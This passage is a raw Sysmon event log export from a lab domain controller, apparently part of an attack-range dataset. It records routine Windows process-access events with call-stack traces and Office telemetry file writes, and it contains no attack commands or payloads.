14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000079648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000079647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-walMD5=1A34D6632965CAF027369B9BC24AA320,SHA256=9D82AEC4A40F13DF3105020AE21F2323E88A9E7494F7AB5730DED09434485ADB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000079634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 23542300x800000000000000079633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shmMD5=821ADC570AB3FA742BCA32CEC2724EBB,SHA256=B995D6F2363A266E8555CB75C7173DCF335135151EDA68ADBAFE5F29C63B4732,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000079631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000079630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000079629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\